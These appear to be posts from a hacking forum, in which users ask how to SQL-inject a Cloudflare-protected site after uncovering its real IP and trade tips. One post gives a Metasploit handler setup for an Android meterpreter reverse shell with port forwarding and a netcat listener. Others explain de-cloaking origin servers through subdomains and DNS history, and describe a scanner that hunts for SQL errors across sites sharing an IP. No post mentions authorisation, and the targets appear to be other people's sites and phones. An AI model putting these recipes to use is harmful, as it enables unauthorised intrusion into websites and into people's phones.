[sql and cloudflare]

i had that problem before . i bypassed the cloudflare and i get the true ip adress for the target

now what to do next to inject the target site with sql for example ?!!

[Gaining Android Access]

use multi/handler

set PAYLOAD android/meterpreter/reverse_tcp

set LHOST xx.xx.xx.xx

set LPORT 24000

exploit -j

make sure that u have the port 24000 open on your router and link it to ur internal ip address

type in terminal nc -lvp 24000

and check if ur port is open throw this site http://www.canyouseeme.org/

if u get a connection from this site that means that all is good with u

that shall work fine

and if u want to use a dynamic dns

https://community.rapid7.com/thread/4676

[Help using Hydra on web form]

use burpsuit and check the post data , who knows may be u can inject the post data

[sql injection while cloudflare on]

If you can de-cloak the severs IP, or find it through other means such as whois archives or netcraft history, then you can point your hosts file at the real IP and then run your attacks. Doesn't mean the exploits work, which would still require a vulnerable version of SQL software and/or accepting unsanitized data input that you can manipulate. One of the quickest checks is replacing www.somesite.com with direct.somesite.com or direct-connect.somesite.com. These often expose the domains real IP, as well as brute forcing sub domains like mail.domain.com, or even ftp.domain.com

thnx digip , actually the site is very well protected and i tried to enumrate the dns with more than methoud but i got a question , if i get the real ip of the server , how can i make the sqlmap or havij for example use the real ip ?? i know that if i get the user of the site , i can do it like that http://127.0.0.0/~/user/etc

but what if i did`nt get the user of the site ? how can i inject the site after getting the real ip ? thnx in advance

[Gaining Android Access]

there is a payload in metasploit make apk and hack the android

android/meterpreter/reverse_tcp

[privet sql server scanner edited by me :)]

yeah sure i just thought it might be useful to share with you that script couse it works fine with me .

[privet sql server scanner edited by me :)]

yeah sure i know but i did`nt hack the server , i`m just trying to explain my point :)

i will try to refine it , and plz u can edit my comments with the site and delete it for me :)

thnx

[privet sql server scanner edited by me :)]

i know its not perfect , the script is simply searching for sql error for ex

ruby mick.rb 127.0.0.1 id
u will get that result

[privet sql server scanner edited by me :)]

nooo

ok try that i know that this server is vurnable to sql and u will understand what i mean :)

ruby mick.rb 127.0.0.1 id

[privet sql server scanner edited by me :)]

the script is simply go to bing.com and write in the search ip:127.0.0.1 so it extract the server sites by that methoud

then it looks for sql error for example .php?id=1 ' it puts the ' for all the id found in the server and if it found any error will tell u that the site is vurnabel :)

[privet sql server scanner edited by me :)]

sorry guys i deleted the script to refine it

[sql injection while cloudflare on]

i`m asking couse i had that problem before and i wonder is there a method to make the sql injection while the cloudflare is on

[sql injection while cloudflare on]

i wonder is there any method to make sql injection while cloudflare firewall protecting the server !! ?

how to bypass it ?

thnx in advance.